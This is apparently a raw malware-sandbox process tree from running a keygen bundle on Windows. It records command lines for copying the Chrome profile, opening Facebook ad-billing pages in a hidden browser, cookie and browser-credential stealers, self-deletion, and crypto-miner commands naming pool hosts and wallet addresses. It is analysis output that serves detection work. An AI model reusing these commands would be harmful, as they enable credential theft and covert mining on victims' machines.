C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" .\ma0IL_U1.C_T -u /s7⤵
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "keygen-step-5.exe" -F6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exekeygen-step-2.exe3⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Users\Admin\AppData\Roaming\1D9B.tmp.exe"C:\Users\Admin\AppData\Roaming\1D9B.tmp.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\1D9B.tmp.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK6⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL4⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.15⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Free.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Free.exe"4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install5⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\JoSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\JoSetp.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\8691400.exe"C:\ProgramData\8691400.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\ProgramData\8846904.exe"C:\ProgramData\8846904.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵
- Executes dropped EXE
- Drops Chrome extension
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y5⤵
- Enumerates system info in registry
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/5⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xdc,0xe0,0xe4,0xb8,0xe8,0x7ffa5e4d4f50,0x7ffa5e4d4f60,0x7ffa5e4d4f706⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1628,17497179036873890169,17171144377230802906,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2332 /prefetch:86⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1628,17497179036873890169,17171144377230802906,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1696 /prefetch:86⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1628,17497179036873890169,17171144377230802906,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1624 /prefetch:26⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1628,17497179036873890169,17171144377230802906,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2848 /prefetch:16⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1628,17497179036873890169,17171144377230802906,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2828 /prefetch:16⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1628,17497179036873890169,17171144377230802906,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:16⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1628,17497179036873890169,17171144377230802906,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:16⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1628,17497179036873890169,17171144377230802906,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3636 /prefetch:16⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1628,17497179036873890169,17171144377230802906,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3876 /prefetch:16⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1628,17497179036873890169,17171144377230802906,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5800 /prefetch:86⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1628,17497179036873890169,17171144377230802906,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5732 /prefetch:86⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1628,17497179036873890169,17171144377230802906,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2232 /prefetch:86⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1628,17497179036873890169,17171144377230802906,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1368 /prefetch:86⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1628,17497179036873890169,17171144377230802906,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2272 /prefetch:86⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-QBBH9.tmp\Install.tmp"C:\Users\Admin\AppData\Local\Temp\is-QBBH9.tmp\Install.tmp" /SL5="$4037E,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-6AK4B.tmp\Ultra.exe"C:\Users\Admin\AppData\Local\Temp\is-6AK4B.tmp\Ultra.exe" /S /UID=burnerch16⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\VideoLAN\VBBCATZOTI\ultramediaburner.exe"C:\Program Files\VideoLAN\VBBCATZOTI\ultramediaburner.exe" /VERYSILENT7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-MCI9P.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-MCI9P.tmp\ultramediaburner.tmp" /SL5="$602B0,281924,62464,C:\Program Files\VideoLAN\VBBCATZOTI\ultramediaburner.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu9⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\e2-83ab8-77c-2928e-0651c18ceb97c\Nekaedyxyta.exe"C:\Users\Admin\AppData\Local\Temp\e2-83ab8-77c-2928e-0651c18ceb97c\Nekaedyxyta.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\11-ef066-6c3-d8ca3-8f324a64d499e\SHaewushotezhi.exe"C:\Users\Admin\AppData\Local\Temp\11-ef066-6c3-d8ca3-8f324a64d499e\SHaewushotezhi.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\filee.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\filee.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\9A3D.tmp.exe"C:\Users\Admin\AppData\Roaming\9A3D.tmp.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\9A3D.tmp.exe"C:\Users\Admin\AppData\Roaming\9A3D.tmp.exe"6⤵
- Executes dropped EXE
- Checks processor information in registry
-
C:\Users\Admin\AppData\Roaming\9C61.tmp.exe"C:\Users\Admin\AppData\Roaming\9C61.tmp.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w5912@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w9940 --cpu-max-threads-hint 50 -r 99996⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\filee.exe"5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg6_6asg.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg6_6asg.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\kabo.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\kabo.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies system certificate store
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\kabo.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\kabo.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\IrecCH6.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\IrecCH6.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-11CSA.tmp\IrecCH6.tmp"C:\Users\Admin\AppData\Local\Temp\is-11CSA.tmp\IrecCH6.tmp" /SL5="$403E6,234767,151040,C:\Users\Admin\AppData\Local\Temp\RarSFX2\IrecCH6.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-TM53G.tmp\player_record_48792.exe"C:\Users\Admin\AppData\Local\Temp\is-TM53G.tmp\player_record_48792.exe" /S /UID=irecch66⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Windows Sidebar\HVAZVBDVBO\irecord.exe"C:\Program Files\Windows Sidebar\HVAZVBDVBO\irecord.exe" /VERYSILENT7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-510EE.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-510EE.tmp\irecord.tmp" /SL5="$205B0,6139911,56832,C:\Program Files\Windows Sidebar\HVAZVBDVBO\irecord.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\recording\i-record.exe"C:\Program Files (x86)\recording\i-record.exe" -silent -desktopShortcut -programMenu9⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\96-8ae2e-732-00ea6-33a03a5c7be49\Vozhutimaxi.exe"C:\Users\Admin\AppData\Local\Temp\96-8ae2e-732-00ea6-33a03a5c7be49\Vozhutimaxi.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\59-9e386-e2e-33f96-bf3fb44c916d3\Dugaeshurihu.exe"C:\Users\Admin\AppData\Local\Temp\59-9e386-e2e-33f96-bf3fb44c916d3\Dugaeshurihu.exe"7⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mx3joouh.j5u\gaoou.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\mx3joouh.j5u\gaoou.exeC:\Users\Admin\AppData\Local\Temp\mx3joouh.j5u\gaoou.exe9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt10⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt10⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\30dw5enr.hlv\google-game.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\30dw5enr.hlv\google-game.exeC:\Users\Admin\AppData\Local\Temp\30dw5enr.hlv\google-game.exe9⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install10⤵
- Loads dropped DLL
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yrwltfiv.rf3\md1_1eaf.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\yrwltfiv.rf3\md1_1eaf.exeC:\Users\Admin\AppData\Local\Temp\yrwltfiv.rf3\md1_1eaf.exe9⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\22yepwlf.prf\build.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\22yepwlf.prf\build.exeC:\Users\Admin\AppData\Local\Temp\22yepwlf.prf\build.exe9⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\22yepwlf.prf\build.exe" & del C:\ProgramData\*.dll & exit10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build.exe /f11⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 611⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\d5eh41lr.ukg\askinstall36.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\d5eh41lr.ukg\askinstall36.exeC:\Users\Admin\AppData\Local\Temp\d5eh41lr.ukg\askinstall36.exe9⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe11⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y10⤵
- Enumerates system info in registry
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/10⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffa5e4d4f50,0x7ffa5e4d4f60,0x7ffa5e4d4f7011⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1604,6794411088331309397,14437730848767912954,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1616 /prefetch:811⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5tvl3dqb.5ha\KiffApp2.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\5tvl3dqb.5ha\KiffApp2.exeC:\Users\Admin\AppData\Local\Temp\5tvl3dqb.5ha\KiffApp2.exe9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rtbmrley.jhi\y1.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\rtbmrley.jhi\y1.exeC:\Users\Admin\AppData\Local\Temp\rtbmrley.jhi\y1.exe9⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\rtbmrley.jhi\y1.exe"10⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK11⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tp3y5y0g.klm\TWYJMAIIET.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\tp3y5y0g.klm\TWYJMAIIET.exeC:\Users\Admin\AppData\Local\Temp\tp3y5y0g.klm\TWYJMAIIET.exe9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"10⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exeparse.exe -f json -b firefox11⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exeparse.exe -f json -b edge11⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exeparse.exe -f json -b chrome11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ghl3h5ub.dyi\ABCbrowser.exe /VERYSILENT & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\ghl3h5ub.dyi\ABCbrowser.exeC:\Users\Admin\AppData\Local\Temp\ghl3h5ub.dyi\ABCbrowser.exe /VERYSILENT9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe10⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe10⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oekpxr1a.wdy\toolspab1.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\oekpxr1a.wdy\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\oekpxr1a.wdy\toolspab1.exe9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\oekpxr1a.wdy\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\oekpxr1a.wdy\toolspab1.exe10⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g300j3ru.z3g\inst.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\g300j3ru.z3g\inst.exeC:\Users\Admin\AppData\Local\Temp\g300j3ru.z3g\inst.exe9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\SGiicyehADwCqfEHqf\XvPGmUC:\Users\Admin\AppData\Local\Temp\SGiicyehADwCqfEHqf\XvPGmU10⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\tFzdteJWcWsoPQxJFR\zlZefTC:\Users\Admin\AppData\Local\Temp\tFzdteJWcWsoPQxJFR\zlZefT11⤵
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\t30lvywj.oa5\GcleanerWW.exe /mixone & exit8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\n20c3aul.4bw\SunLabsPlayer.exe /S & exit8⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
-
C:\Users\Admin\AppData\Local\Temp\n20c3aul.4bw\SunLabsPlayer.exeC:\Users\Admin\AppData\Local\Temp\n20c3aul.4bw\SunLabsPlayer.exe /S9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszD9E3.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszD9E3.tmp\tempfile.ps1"10⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszD9E3.tmp\tempfile.ps1"10⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszD9E3.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszD9E3.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszD9E3.tmp\tempfile.ps1"10⤵
-
